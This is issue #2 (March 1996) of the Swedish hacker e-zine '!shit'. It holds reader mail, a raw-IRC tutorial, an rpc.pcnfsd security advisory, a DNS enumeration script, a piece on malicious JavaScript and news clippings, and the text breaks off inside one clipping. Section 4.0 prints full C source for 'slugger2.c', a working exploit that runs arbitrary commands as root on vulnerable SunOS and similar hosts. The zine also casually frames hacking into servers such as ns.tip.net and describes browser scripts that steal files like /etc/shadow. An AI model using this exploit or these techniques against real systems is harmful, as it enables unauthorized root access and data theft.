#!/bin/more ____ / \ ____ __ ____ \ /______/_ /_ ___/ /_ \ / _ / \ / _/ \/ __ \_/ __ / / / Nummer #2 (hse/a) / \ \ \ /__/__/__/ Mars 1996 \__/_______/ desejerunte? No idle, no gain BRAINSTORM Words, words, words 1.0 MAIL Vi drar nÂgra lyckliga vinnare 2.0 frÂn mÂnadens posts”ck IRC IRC utan skyddsn”t: Raw-IRC Dead Socket 3.0 HACK Bug i pcnfsd lÂter dig exekvera Shellshock 4.0 kommandon som root źntligen ”r den h”r, DNScan 1.0 Shellshock 4.1 WWW Kreativ Java-kodning htXs 5.0 NYTT 6.0 Etisk storst”dning p internet 6.1 Epost som att skicka hemlighet med vykort 6.2 Os”kert lÂta konsult sk–ta Malm–polisens datahantering 6.3 Sex och politik bannlyst 6.4 Slutet f–r de elektroniska klotterplanken 6.5 Netscapes kryptering bruten p nytt-med gammal metod 6.6 Storebror fumlar med lagb–ckerna 6.7 HD l”t datakopierare behÂlla utrustning 6.8 Lucka i lagen skyddar piratkopior 6.9 SURF źr Mitnick en ¸berhacker eller en htXs 7.0 luser, avg–r sj”lv MISC Riksspolisstyrelsen p Internet Broken Pipe 8.0 En sysadmins samvete CB 8.1 ----------------------------------------------------------------------- Ord gÂr ut till bes”ttningen p #hack.se f–r hj”lp med distributionen ----------------------------------------------------------------------- (C)opyright? /* ------------------------------------------------------------- All information i !shit publiceras endast i studiesyfte och som underhÂllning. Artikelf–rfattarna i !shit ”r inga f–rebilder. De ”r inte ens m”nskliga. De ”r hackers. Vissa saker de g–r kan f en person skadad, relegerad, arresterad, m–jligtvis utvisad. F–r att uttrycka det hela p ett annat s”tt: Don't try this at home. ------------------------------------------------------------- */ ___ ___ __ __ __ _ __ ____ ___ ___ _ __ ___ | _)| )/ | | \ |( _|_ _) _ \ ) V | _____________________________ 1.0 |____)_)_\_|_|__|_\__|___)|__|\___/_)_\_v__| Sedan den f–rra och f–rsta filen vi s g”rna kallar !shit tr”ffade gatorna har jag b–rjat dra mig f–r att visa mig p irc. Jag kan f–rst att vÂra texter fungerar som ett livselexir f–r vissa, men ingen kan vara s beroende av detta alster att det ber”ttigar att frÂga mig *varje* dag n”r n”sta nummer kommer. Artiklar kommer in l–pande, och nya nummer kommer att sl”ppas s fort det finns tillr”ckligt med material f–r att r”ttf”rdiga det. Allts kommer varje release sporadiskt, och jag varken vill eller kan veta n”r det blir. SÂ, det tj”nar inget till att *tjata*. Ok? Detta ”r inte ett angrepp p *alla* som frÂgat hur det gÂr med #2, tv”rt om ”r det givetvis trevligt att veta att det finns en efterfrÂgan p det vi g–r. Bara det finns mÂtta. Hoppas vi lyckats leva upp till f–rv”ntningarna. Kanske inte som en blixt frÂn klar himmel har det uppstÂtt en hel del ideer om hur !shit skall uttalas. Om dessa ideer faktiskt ”r missf–rstÂnd lÂter jag vara osagt eftersom det tvivell–st inte finns en absolut sanning i denna vetenskap. Men som en spark i r”tt riktning f–r den skara som inte alls kan ta till sig betydelsen av utropstecknet i namnet, vill jag citera manfilen f–r bourne-shell: "! Unary negation operator". Nog om detta. LÂt artiklarna och synpunkterna forts”tta fl–da till: noshit@alpha.c2.org __ __ __ __ _ ___ | V |/ | | |_ _______________________________________________________ 2.0 |__v__|_|_|__|___| frÂn /usr/lib/snedmail Tyv”rr kan vi av utrymmessk”l inte ta med alla brev som vi fÂtt, men vi uppskattar dem inte mindre f–r det. Fors”tt skriva! H”r kommer nÂgra smakprov som ganska bra representerar majoriteten av vÂr brevsk–rd. Date: Thu, 04 Jan 96 19:14:00 +0200 From: Phoo Subject: tack... sn”llt.. Tack s mkt f–r att du gjort mig k”nd i ditt "fina" zine !SHIT... mkt trevligt.. nu kommer jag f–rmodligen bli tvungen att byta nick.. fan ta dig.. :( annars s d–g !shit n”stan... kommer det fler nummer eller? vart kommer man f tag i skiten? l”gg upp det p nÂn ftp... || -Phoo- of AiP \__/ * SLMR 2.1a * ------------------------- Date: Fri, 05 Jan 96 16:19:00 +0200 From: SPiFf Subject: Lama.. Hohoooo... Jag l”ste just "din" tidning !shit, vilket faktiskt sammanfattar den r”tt bra... Shit.. Fukk, den suger kuk.. Kan du inte g–ra en b”ttre tidning s g–r ingen alls.. Du verkar tro att man ”r ELiTe f–r att man anv”nder lite freakiga versaler/gemener.. Jag ”r fan s”ker p att du inte ens ”r nÂn pirater –.h.t. Du ”r bara en liten Lama som sitter och skriver mesiga sm E-ZiNes... Elite Commandments: ------------------- 1] Never admit you have no idea what you're talking about. (Den tar du bokstavligt) 2] Never have a good word to say about anyone else but yourself. (Wow.. Den f–ljer du ocksÂ) 3] Join every group that will let you join. After a few weeks have passed, quit & claim they aren't good enough to merit your prescence. (Hee.. Pook..) 4] Always shift the blame to someone else. "It's not my fault" should become 2nd nature to you. (Humm....) 5] Always have nasty things to say about your so called friends behind their backs. 6] Hate as many people as possible. (Du har v”nt p den, "f s mÂnga som m–jligt att hata dig") 7] Start as many rag wars as humanly possible. When your up against intelligent people (As on Adventurers Tavern, 1982-1986. RIP), and losing your end of the war. Say "This is stupid and childish, even if I did start it", and stop posting. 8] When someone becomes pushy and openly challenges your lack of knowledge about something. Say "I know the answer, but you're not elite enough, so I can't tell you". (Haha.. r”tt i prick) 9] If anyone still dares to question you then threaten them with tough things like getting someone to turn their phones off, or charge 10 billion toilets on their mothers credit card. (It doesn't matter whether or not you actually know how to do this, or know anyone else who will do it for you. This is a favorite tactic of ELITE!@ phreak groups like L0D!!@#1!.) If all else fails began chanting "Cable throw, Cable throw, Cable throw" or if you are a pirate: make a fright- ening rag page on them in your next Copya crack. [Warning: Be sure to only use this on a fellow ELITE!@#1! phreak, pirate or equivalent ignorant person. Anyone else will laugh at you & tell you to fuck off. Only adding to the questioning of your massive eliteness.] 10] Make as big a fool of yourself as is possible. Display your ignorance and stupidity in a manner that will make itself noticible to the modem community at large. If you are a aspiring elite pirate, get your name on as many copya cracks as fast as possible. Or if you are a up and coming elite phreak, start up your own little world (or join someone else who has already done this, such as LOD), refuse to see anyones viewpoint but your own, & declare yourselves mega-elite. F–ljer du bara dom h”r reglerna eller? Fukk.. Och sen, n”r du b–rjar ta pHOo som exempel p en lama, s ”r du ganska lÂngt ute i skogen. Har du inte h–rt talas om pHOo s vet jag fan inte var du har varit de n”rmaste mÂnaderna.. Under en sten? =) En sak till; p din lilla SuRf lista (Vem fan anv”nder ordet surfa ”ndÂ? LÂter som aftonbladet "S h”r surfar du p n”tet..") Duh.. Iaf, inte en enda FTP fanns med, alla kanske inte gillar att sitta och se en massa fina bilder och menyer som p WWW, jag f–rstÂr att W95-luserz som du kanske gillar det, men de flesta vill ha FTPs n”r man ska ladda hem prylar.. Ut och smurfa med dig... Jaja, forts”tt knapra p dina sm floppiez och skriv din ZiNe, men tro inte att nÂn bryr sig... Iaf inte jag, the almighty SPiFf... =) Fuck ELiTe, go ShareWare... NOT NOT NOT NOT NOT NOT!!!!!! =) /EL SPiFf of AiP Rokxz da funkie Joint.... * SLMR 2.1a * __ ___ ___ ___ | | ) __) _____________________________________________________________ 3.0 |__|_)_\___) Raw-IRC, av Dead Socket Du har precis hackat ns.tip.net och k”nner att du beh–ver bes–ka #hack.se f–r att skryta med din er–vring. Men det finns givetvis ingen irc-klient p ns.tip.net. Vad g–r du nu? Min rekommendation ”r att du kollar i Gula Sidorna under P f–r psykolog. Inte i helvete ”r du v”l s dum att du anv”nder ns.tip.net f–r att irca? Kom igen! Allvarligt talat, s ”r protokollet mellan klient och server baserat p kommandon som skickas i klartext, och det hela ”r mycket enkelt och raktfram. Att hoppa –ver klienten och ansluta sig direkt till servern kallas ibland f–r raw-irc. Det ”r inte svÂrare ”n en telnet till din favoritserver p port 6667 och att f–lja dessa enkla instruktioner. beavis> telnet irc.nada.kth.se 6667 Trying 130.237.226.10... Connected to mumrik.nada.kth.se. Escape character is '^]'. Det f–rsta som h”nder n”r du kopplar upp dig mot port 6667 ”r att irc-servern f–rv”ntar sig viss information om dig. B–rja med att skriva; NICK IvilHaxor ...eller vilken nick du nu vill anv”nda. D”refter mÂste du ange ditt konto, host- och servername, samt ditt "riktiga" namn. F”lten f–r hostname och servername ignoreras, s d”r kan du skriva vad som helst. Syntaxen ”r: USER ivilhax hostname servername :Da iViL 0nE Om nicken inte ”r upptagen s kommer du att se ditt v”lkomstmeddelande som indikerar att du ”r inne. Nu kan du anv”nda alla dina vanliga kommandon typ JOIN, PART, MODE, osv. JOIN #hack.se :ivil!~ivil@enemy.public.se JOIN :#hack.se :irc.nada.kth.se 353 ivil @ #hack.se :ivil @shshock @TheK @blur @Chaoz tcm @E-114 chaotic @acdhead @thk psyched :irc.nada.kth.se 366 ivil #hack.se :End of /NAMES list. Det som ”r annorlunda ”r hur du skriver till en channel eller skickar msg's. BÂda delarna g–r du med PRIVMSG enligt f–ljande: PRIVMSG #hack.se :w0rdawp, wassup? PRIVMSG shshock :n4r k0mm3r !shit #2, d00d? Om du ”r inaktiv kommer du att f upp ett PING-meddelande. Typ: PING :irc.nada.kth.se Det mÂste du svara pÂ, annars kommer du att bli nedkopplad. Skriv: PONG :irc.nada.kth.se SvÂrare ”n s ”r det inte. Om du vill ha mer information om irc-protokollet s finns det beskrivet i RFC1459. _ __ __ ___ _ __ ___ | L |/ | _| / / _______________________________________________________ 4.0 |_||_|_|_|___|_|_\ Avalon Security Research Release 1996.1 (pcnfsd) Affected Program: rpc.pcnfsd Tested Operating Systems: SunOS 4.1.X, Linux Affect: Remote attackers may execute an arbitrary command as root on the target machine. Bug Synopsis: rpc.pcnfsd's run_ps630 function does not correctly validate it's arguments. This allows us to trick rpc.pcnfsd into running a command other than ps630. Fix: The the run_ps630 function does not seem to be needed. Removing the only call to it in pr_start (pcnfsd_print.c) should remove this vulnerability. Exploit Information: Exploit code will be posted to the ASR mailing list exactly one week from the release of this advisory. Notes: Although the rpc.pcnfsd bundled in all Linux distributions is vulnerable. Is appears to be exceedingly difficult to exploit this vulnerability under Linux. ASR welcomes and appreciates information on the action of this vulnerability in other operating systems. Sedan denna advisory sl”pptes har det gjorts fler tester, och buggen verkar inte vara m–jlig att utnyttja under Linux. Dock har vi kunnat bekr”fta att SunOS 4.x, Irix och BSDI ”r sÂrbara. Ta hem sourcen till pcnfsd frÂn bcm.tmc.edu:/pcnfs/pcnfsd.93.02.16.tar.Z och kompilera nedanstÂende program f–r att testa om din pcnfsd ”r sÂrbar. Om du har m–jlighet att g–ra tester under nÂgot annat OS ”n ovan n”mnda s ”r vi mycket intresserade av resultatet. Skicka info till shshock@alpha.c2.org. -----------------8<-- klipp h”r ----------------------------------------------- /* slugger2.c * By Josh D. November 1st 1995 AD * rewritten January 31st 1996 AD * compile w/ pcnfsd_clnt + pcnfsd_xdr + rpcsvc * usage: slug2 target 'command' * where: * slug2 is this program. * target is the target host * 'command' is a bourne shell command within single quotes *and* * with the slash chr ('/') substituted with the A environment * variable: e.g. 'touch ${A}filename' would equate to * 'touch /filename'. * caveat: * The command is limited to 27 charactars. * Using shell meta-charactars (!#$^&*()<>[] etc etc) in your command * will cause the exploit to fail. * If rpc.pcnfsd was started from the rc scripts (as opposed to inetd) * which it usually is: it will die after one succesful run of this * program. * The rpc calls this code makes always fail and print the error code: * '137' <<---- See 'wierd ass error' below. * This code always times out ont it's pr_start call because rpc.pcnfsd * dies before it gets a chance to reply. This fix for this is * to make to timeout value very small for the pr_start call. * * ********************************************************************** * * This code is provided for educational purposes only. * Neither Josh D. nor ASR take any responsibility for the use * or misuse of this code. * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcnfsd.h" /* this should be created by rpcgen */ int main(argc, argv) int argc; char **argv; { char myhost[200]; int gids[8]; struct hostent *dahent; struct sockaddr_in daserver; CLIENT *datsme; struct pr_init_args daargs; struct pr_init_res *dares; struct pr_start_args fags; struct pr_start_res *figs; char daprinter[65]; char dadir[65]; char dapath[255]; struct timeval tout; int ranysock=RPC_ANYSOCK; tout.tv_sec=60; tout.tv_usec=0; if (argv[3] != NULL && argv[4] != NULL) { printf("bad arguments\n"); exit(1); } if (strlen(argv[2]) > 27) { printf("command must be less than 27 chars\n"); exit(1); } /* this must be a valid printer */ strcpy(daprinter, "lp"); daserver.sin_family = AF_INET; daserver.sin_port = 0; dahent = gethostbyname(argv[1]); if (dahent == NULL) { printf("gethost failed.\n"); exit(1); } bcopy(dahent->h_addr, &daserver.sin_addr.s_addr, 4); datsme = clntudp_create(&daserver, 150001, 1, tout, &ranysock); clnt_control(datsme, CLSET_TIMEOUT, &tout); gids[0]=0; gids[1]=1; datsme->cl_auth = authunix_create(myhost, 0, 0, 2, gids); sprintf(dapath, "..${A:=$HOME}..$A..${A}bin${A}sh -c \"%s\" ", argv[2]); daargs.pia_client = dapath; daargs.pia_printername = daprinter; /* Wierd ass error: whenever we pub '"' in a string for pr_init/pr_start rpcsvc seems to break. This doesn't imapir the effects of the exploit, it simply doesn't allow us to see any errors pcnfsd returns. I don't plan on fixing this. */ /* simple minds.... */ if ( (dares = pcnfsd_pr_init_1(&daargs, datsme)) == NULL) { printf("137\n"); } else { if (dares->pir_stat == PI_RES_OK) printf("Success\n"); if (dares->pir_stat != PI_RES_OK) { printf("Error: "); switch(dares->pir_stat) { case PI_RES_NO_SUCH_PRINTER : printf("No such printer\n"); break; case PI_RES_OK : printf("Result Ok\?\?\n"); break; case PI_RES_FAIL : printf("Generic Failure\n"); break; default : printf("Unknown Error\n"); } } } fags.psa_client = "."; fags.psa_printername = daprinter; fags.psa_username = "root"; fags.psa_filename = dapath; fags.psa_options = (argv[3] == NULL) ? "d ;> " : "d ;< "; /* simple pleasures */ figs = pcnfsd_pr_start_1(&fags, datsme); if (figs == NULL) { printf("137\n"); exit(1); } } -----------------8<-- klipp h”r ----------------------------------------------- 4.1 Universalverktyget f–r dom”nfrÂgor DNScan F–r ett tag sedan s ville jag lista alla burkar med DNS-entries f–r ett helt land, och insÂg att det inte l”t sig g–ras enkelt. S jag hackade ihop en liten utility f–r det, och gav den till nÂgra kompisar p #hack.se och bad att de inte skulle sprida den vidare tills det att jag hade en f”rdig och bugtestad version klar. Mindre ”n en vecka senare b–rjade jag f mail frÂn st”llen s lÂngt bort som Malaysia som tackade f–r att jag skrivit ett sÂdant anv”ndbart verktyg. Hmm... Tyngd av ansvaret att folk faktiskt anv”nder mitt lilla script har jag nu fixat de buggar som fanns och fÂtt fram en version 1.0 som jag vÂgar st f–r. HÂll till godo. -----------------8<-- klipp h”r ----------------------------------------------- #!/bin/sh # # DNScan 1.0 by Shellshock (shshock@alpha.c2.org) # # Directory for temporary files TMPDIR=. # Name of lockfile for -file mode LOCKFILE=$TMPDIR/dnscan.lock # Set default parameters to nslookup, 2 retries with a timeout of 10 secs PARAMS="-retry=2 -timeout=10" # Print usage information usage() { more << end-of-text Usage: dnscan [-quiet] [-file ] [-domain ] [-sub ] -quiet Useful when piping to a file while running in the background. -file Use as a list of subdomains and servers to scan. -domain List all servers in a first level domain like .uk or .no. -subdomain List all servers in a subdomain. DNScan usually generates alot of output, so you probably want to pipe the output to a file. Some messages will still be sent to you terminal to keep you informed of whats going on, unless you use -quiet. The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. It will not work with the com, edu, mil, gov, net or org domains, because there is no single name server that will list these. If you want to create your own file to run in the -file mode, each line of the input file needs to have the following format: [] * To list all servers in Japan, do "dnscan -domain jp". * To list all servers in the netcom domain, do "dnscan -sub netcom.com". * To find Sun boxes at swipnet, do "dnscan -sub swip.net | grep -i sun". I've found that sometimes nslookup hangs on a query. Just find nslookup with ps and kill it, and the scan will continue with the next subdomain. end-of-text } ### Strip away all unwanted lines from the output of the 'ls -d', that is: ### - all server names ending with a dot, they are probably in another domain ### - all references to localhost (127.0.0.1) ### - all lines not of the type A or HINFO clean_serverlist() { sed -n " { /^.*\. /d /127.0.0.1$/d / A /s/^ /$SUBDOMAIN /p / HINFO /s/^ /$SUBDOMAIN /p } " | sort -u } ### List the name servers handling the selected subdomain list_subdomain_dns() { echo "$SUBDOMAIN" | nslookup -querytype=ns $PARAMS |\ sed -n 's/.*nameserver = //p' } ### Print a formated list of servers (recordtypes A and HINFO) in a subdomain ### If we don't already have selected a name server, take the first in the ### list from list_subdomain_dns, or even better use one that is actually ### within the subdomain list_subdomain() { if [ -z "$DNS" ]; then DNS=`list_subdomain_dns | grep -i $SUBDOMAIN\$ | sed -n 1p` [ $DNS ] || DNS=`list_subdomain_dns | sed -n 1p` [ $QUIET ] || echo "Using name server $DNS for *.$SUBDOMAIN" >&2 fi echo "ls -d $SUBDOMAIN" | nslookup $PARAMS - $DNS | clean_serverlist } ### Scan all subdomains listed in a file from_file() { while read domain subdomain DNS; do [ $domain ] || continue SUBDOMAIN=$subdomain.$domain # If POS is set, we are continuing an interrupted scan if [ $POS ]; then [ $SUBDOMAIN != $POS ] && continue unset POS fi [ $QUIET ] || echo "Scanning $SUBDOMAIN" >&2 # Write infile and subdomain to a lockfile, so that we # later can continue the scan if we get interrupted echo "$INFILE $SUBDOMAIN" > $LOCKFILE list_subdomain echo done < $INFILE } ### Strip away all but the NS lines from the output of the 'ls -d' and sort ### Also filter server names ending with a dot, and prepend the domain name ### first on each line clean_dnslist() { sed -n " { /^.*\. /d s/^ /$DOMAIN / s/ NS / /p } " | sort -u +1 -2 } ### List all the name servers handling the selected domain list_domain_dns() { ( echo root; echo "$DOMAIN." ) |\ nslookup $PARAMS -querytype=ns -domain=$DOMAIN |\ sed -n 's/.*nameserver = //p' } ### List all name servers in the selected domain list_domain() { DOMAINFILE=domain.$DOMAIN # Use first name server in the list for the domain domain_dns=`list_domain_dns | sed -n 1p` [ $QUIET ] || echo "Using name server $domain_dns for *.$DOMAIN" >&2 # Create a file with all subdomains and their name servers, and then # switch to -file mode echo "ls -d $DOMAIN" | nslookup $PARAMS - $domain_dns |\ clean_dnslist > $DOMAINFILE MODE=file INFILE=$DOMAINFILE from_file } ### Parse flags unset QUIET while [ -n "$1" ]; do case "$1" in -quiet) QUIET=true ;; -file) MODE=file INFILE=$2 shift ;; -domain) MODE=domain DOMAIN=`echo $2 | sed 's/^\.//'` shift ;; -sub) MODE=subdomain SUBDOMAIN=`echo $2 | sed 's/^\.//'` shift ;; *) usage exit ;; esac shift done ### Look for previously interrupted scan if [ -f $LOCKFILE ]; then echo "Continue previously interrupted scan [n]? \c" >&2 read r if [ `echo x$r | grep -i "^xy"` ]; then read INFILE POS < $LOCKFILE [ $POS ] && MODE=file fi [ $QUIET ] || echo >&2 fi ### Present ourself [ $QUIET ] || ( echo "DNScan 1.0 by Shellshock"; echo ) >&2 ### Select mode case $MODE in file) from_file ;; domain) list_domain ;; subdomain) list_subdomain ;; *) usage exit ;; esac ### Clean up the temporary file we have created rm $LOCKFILE 2>/dev/null __ __ __ __ ___ \ \/\/ /\/\/ /\/\/ / _____________________________________________________ 5.0 \_/\_/\_/\_/\_/\_/ Kreativ Java-kodning, av htXs Debatten om vad nÂgon med ont uppsÂt kan st”lla till med, med hj”lp av Java ”r i full gÂng. Redan finns det ett par ganska skr”mmande (eller upplyftande, beroende p vem man ”r) f–rslag: Ta f–ljande lilla script till exempel.
N”r du tror att du endast tittar p en helt oskyldig sida med en GIF-bild pÂ, s skickas i sj”lva verket ett mail till noshit@alpha.c2.org, i *ditt* namn, i –gonblicket som du –ppnar sidan. http://www.popco.com/grabtest.html Eller vad s”gs om ett script som g–mmer sig i bakgrunden, och varje gÂng du gÂr till en ny URL s rapporteras det tillbaka till servern d”r du "plockade upp" det elaka scriptet? http://www.osf.org/~loverso/javascript/track-me.html Det tredje och kanske v”rsta exemplet ”r ett script som listar ett bibliotek eller en fil p din hÂrddisk, och skickar iv”g resultatet. Om du skulle starta Netscape som root inneb”r att din /etc/shadow helt pl–tsligt kan plockas frÂn din dator, utan att du m”rker det! http://www.osf.org/~loverso/javascript/dir.html Brendan Eich frÂn Netscape lovade (inofficiellt) f–ljande 29/2 f–r att l–sa ovanstÂende s”kerhetsproblemen med Java: "We're fixing directory listing and mail spamming, plus adding a Preference to disable JavaScript, in a special 2.01 release that's about to supercede 2.0. Also in the Gold release, and (of course) in the "next release" (3.0b1, I believe)." Hmm... __ _ _ _ ____ __ ___ | \ | ) |_ _) ) _______________________________________________________ 6.0 |_\__|_ |__|__| Nyhetsklipp frÂn januari och februari (___/ --------------------------------------------------------------------------- 6.1 Dagens Industri, 951230 Etisk storst”dning p internet --------------------------------------------------------------------------- Det finns mycket skr”p p det internationella datan”tet internet. Lika illa ”r det med de speciella databaser som gÂr under beteckningen BBS, elektroniska anslagstavlor. Information som snarast ”r desinformation presenteras som om de vore nyttiga nyheter. Men nu ”r det dags f–r etiska spelregler. Det ska bli slut p den elektroniska milj–f–roreningen - de svenska IT-f–retagens branschorganisation Sito gÂr till attack och uppmanar sina medlemmar att stoppa oetisk information. Jag tror att branschen kan sanera sig sj”lv, s”ger Hans Iwan Bratt, VD f–r Sito i Stockholm. Med vÂra nya regler om ansvar f–r elektronisk information skapar vi nÂgot som n”rmast liknar de pressetiska reglerna. Det vore olyckligt med stelbent lagstiftning, en lagstiftning som ”nd inte skulle ge effekt. Hotas med uteslutning Sitos medlemsf–retag blir skyldiga att f–lja de stundande etiska aff”rsreglerna f–r elektronisk information. Den som bryter mot dem utesluts ur branschorganisationen. Hans Iwan Bratt anser att de stora problemen med skr”pinformation handlar om dÂlig och f–rÂldrad information. Det f–rekommer ocks obehagliga f–rf–ljelser mot privatpersoner och folkgrupper p sÂv”l internet som p vissa BBS-adresser. D”remot tycker Hans Iwan Bratt att spridningen av barnpornografi fÂtt allt f–r stor publicitet: Det ”r ett ytterst litet problem med f akt–rer och f intresserade. Personf–rf–ljelser och sabotage av olika slag ”r betydligt allvarligare f–r internets rykte. Ett vanligt sabotage ”r s kallad bombning: en misshaglig person eller akt–r p internet fÂr s mycket elektronisk post att dennes elektroniska brevlÂda kollapsar. Resultatet blir ofta att personen eller operat–ren fÂr st”nga sin anslutning till internet. I USA har t ex militanta kvinnogrupper bombat internetsidor som visar porr- och fotomodeller. Risk f–r pestst”mpel Enligt Hans Iwan Bratt l–per internet stor risk att f samma pestst”mpel som 071-numren fick f–r nÂgra Âr sedan. Det hotar den kommande kommersiella utvecklingen av internet och d”rf–r reagerar branschen. Svag organisation Sito hette tidigare LKD och samlar 250 medlemsf–retag med en total oms”ttning p 100 miljarder kronor - 90 procent av branschens totaloms”ttning. źnd anses Sito vara en relativt svag branschorganisation; flertalet IT-f–retag ”r smÂf–retag som inte ”r med men som ”nd agerar p internet eller BBS. Det ”r dessutom i praktiken om–jligt att f–rbjuda information p internet utan att kapa f–rbindelserna med omv”rlden. F–rbjuds tex stark–lsreklam p internet i Sverige s kan informations- l”mnaren flytta till utlandet med nÂgra enkla handgrepp vid datorn. --------------------------------------------------------------------------- 6.2 TT, 960123 Epost som att skicka hemlighet med vykort --------------------------------------------------------------------------- Datas”kerheten p svenska f–retag och myndigheter ”r ofta skr”mmande dÂlig. Sekretessbelagda uppgifter om privatpersoner, till exempel sjukjournaler, straffregister och annat gÂr i klarskrift –ver internet. Hemlig f–retagsinformation s”nds utan skydd. -Det ”r som att skicka hemligheter med vykort, s”ger dataexperten Tommy Pedersen. Han har jobbat med datas”kerhet i sex Âr och b–rjar bli ganska luttrad. S”kerhetsbristerna ”r ofta h”pnadsv”ckande. P tisdagen pratade han s”kerhet p ett seminarium vid en fackm”ssa f–r tele- kommunikationer p Svenska M”ssan i G–teborg. D”r, p Telecom Scandinavia, var det de tekniska nymodigheterna och alla sp”nnande m–jligheter de ger, som var huvudtemat. I Tommy Pedersens v”rld finns ”ven den m–rka sidan av utvecklingen, den som kan anv”ndas f–r industrispionage och som kan hota m”nniskors personliga integritet. F–r den som vill leta ”r det inga problem att till exempel sortera i epost-h–garna p internet. Bara att ta fram Speciella program hj”lper snokaren att leta och tar bara fram det han eller hon ”r intresserad av. -Det ”r fritt fram f–r den som vill spionera, s”ger Pedersen. Han arbetar f–r ett f–retag som heter Sectra AB i Link–ping och som levererar krypteringsutrustning f–r datakommunikation till svenska f–rsvaret. D”r finns medvetenheten. P privata marknaden och bland myndigheterna ”r vakenheten s”mre. -Datainspektionen borde f st–rre resurser, framf–r allt n”r det g”ller tekniker, s”ger Tommy Pedersen. Han har sett strikt privata, sekretessbelagda personuppgifter g helt –ppet p n”tet. F–retag, som l”gger stora summor p elektroniska –vervaknings- system, vaktutbildning och svÂrforcerade st”ngsel, skickar just den f–retagsinformation man vill skydda utan minsta sekretess. Som vykort, enligt Pedersen. -Hade de legat i kuvert s hade man Âtminstone haft det lilla skyddet f–r hemligheterna. Bristerna finns p alla nivÂer, ”ven hos stora svenska multinationella f–retag. SÂdana som borde veta b”ttre. Inte dyrt att skydda Tekniken f–r att kryptera och skydda informationen har funnits l”nge och ”r heller, enligt Pedersen, inte speciellt dyr. Problemet ”r snarare att f beslutsfattarna att f–rstÂ. -S”kerhetscheferna p f–retagen har ofta sin bakgrund i vad man kan kalla fysisk s”kerhet. Kommunikationerna ”r teknikernas sak, s”ger Pedersen. I Sverige finns det en handfull f–retag som sysslar med s”kerhetsfrÂgor. I utlandet, till exempel Italien och England, ”r branschen betydligt mer utbyggd. Antalet databrott har tvingat fram medvetenheten. --------------------------------------------------------------------------- 6.3 TT, 960124 Os”kert lÂta konsult sk–ta Malm–polisens datahantering --------------------------------------------------------------------------- Rikspolisstyrelsen (RPS) har f–rbjudit l”nspolism”staren i Malm–, Hans Wranghult, att lÂta en utomstÂende konsult ta hand om myndighetens hela datahantering. -En kov”ndning och dessutom inkonsekvent eftersom RPS ocks anv”nder konsulter, menar en besviken Wranghult. Det handlar inte om kostnaden. I st”llet h”nvisar RPS till s”kerhetsaspekten i beslutet att stoppa Malm–polisens konsultplaner. Det som Malm–polisen planerat kallas i datakretsar f–r "outsourcing". Det inneb”r att hela dataverksamheten, hanteringen av allt frÂn spaningsuppgifter till bokf–ring, skulle l”ggas ut p ett konsultf–retag. Att g–ra det ”r enligt RPS en mycket k”nslig frÂga, och strax f–re Ârsskiftet f–rbj–d man uttryckligen Malm–polisen att fullf–lja planerna, ber”ttar Sveriges Televisions Sydnytt. Hans Wranghult, som bland annat utrett databrott och ”r RPS databrottsexpert, f–rvÂnas –ver beslutet: -Jag har planerat detta sedan h–sten 1994 och naturligtvis gjort s”kerhetsbed–mningar. -I –ver ett Âr har RPS dessutom haft full insyn och fÂtt information om projektets fortskridande. Senast i september var en representant frÂn RPS p bes–k h”r, s”ger Wranghult till TT. Under hela processen fram tills helt nyligen har l”nspolis- m”staren varit –vertygad om att konsultprojektet d”rf–r varit f–rankrat och uppskattat hos RPS. Stategisk betydelse Det var RPS dataexpert Bj–rn Lindqvist som bes–kte Malm– i h–stas. Hans bild ”r nÂgot annorlunda ”n Wranghults. -Jag kan bara beklaga om Hans Wranghult fick intrycket att vi var positiva till outsourcing. I sj”lva verket f–ranleddes mitt bes–k av att vi d helt nyligen insett omfattningen av Malm–s planer. -Efter mitt Malm–bes–k gjorde jag omedelbart en muntlig rapport till rikspolisstyrelsens direktion. -Wranghult borde ha insett att detta var en frÂga av strategisk betydelse, ett beslut som ytterst mÂste hamna hos rikspolischefen. Lindqvist pÂpekar ocks att l”nspolisorganisationerna i Stockholm och G–teborg klarar av att i huvudsak sj”lva hÂlla i sin datahantering. -Det kan f–rekomma vissa konsultinsatser. Men total outsourcing, som Malm– planerade, finns inte nÂgonstans inom polisen, s”ger han. RPS uttryckliga f–rbud mot att anv”nda ett utomstÂende f–retag f–r drift, underhÂll, och fortbildning inom datahanteringen, tvingade Malm–polisen att bryta samarbetet med det databolag som d redan arbetat med en totalinventering av myndighetens datahantering. 900 000 kronor ”r hittills nedpl–jda i projektet. -Men det ”r inte pengar som kastats i sj–n. Den st–rsta kostnaden ligger just p inventering och dokumentation, menar Wranghult. Efter kallduschen med RPS f–rbud har l”nspolismyndigheten i Malm– ocks hunnit g vidare i arbetet med att bygga upp den egna kompetensen p omrÂdet. Den gÂngna helgen annonserade man exempelvis efter en datachef. --------------------------------------------------------------------------- 6.4 Svenska Dagbladet, 960206 Sex och politik bannlyst --------------------------------------------------------------------------- Den allm”nna ordningen mÂste uppr”tthÂllas. Det inneb”r att kineserna fÂr klara sig utan politik och sex p Internet. Den kinesiska regeringen b–rjar bli orolig f–r att cyberrymden ska f–rvrida huvudena p alla n”tsurfare. Ministeriet f–r Post och Tele ska se till att alla Internetanv”ndare registreras och att alla kontakter med internationella datan”t gÂr via ministeriet, enligt tidningen Financial Times. Allt f–r att komma ifrÂn "oh”lsosamma tendenser" i samh”llet. Exempel p sÂdana tendenser ”r individer som sysslar med statshemligheter och pornografiskt material - s kallad barbarisk information. Icke –nskv”rt Hur ska d Kina f stopp p informationen som fl–dar p Internet. Jo, genom att skapa en "Internet Light" d”r anv”ndarna har obegr”nsad tillgÂng tillvarandras material men avsk”rmas frÂn det som inte ”r "–nskv”rt" frÂn omv”rlden. Kina gÂr med i det nya informationssamh”llet, men begr”nsar samtidigt tillg”ngligheten, skriver tidningen Wall Street Journal. źn s l”nge anv”nder bara 50 000 m”nniskor Internet i Kina. F–r vetenskapsm”n ”r n”tet en guldgruva eftersom informationen ”r gratis. Explosiv brygd Den kinesiska regeringen fruktar fr”mst politisk opposition och pornografi. Dissidenter som skickar information via n”tet till sympatis–rer i Kina ”rinte popul”ra. Regeringens "Internet Light" inneb”r att de kinesiska anv”ndarna kan skapaegna hemsidor, byta information med varandra, anv”nda databaser och bes–kade hemsidor som accepteras av regimen. ÷vriga delar av Internet g–rs otillg”ngliga med hj”lp av ett mjukvaru- program frÂn det amerikanska f–retaget Sun Microsystems. Kineserna erk”nner att en hacker kan ta sig igenom. Men det ”r bÂde svÂrt och 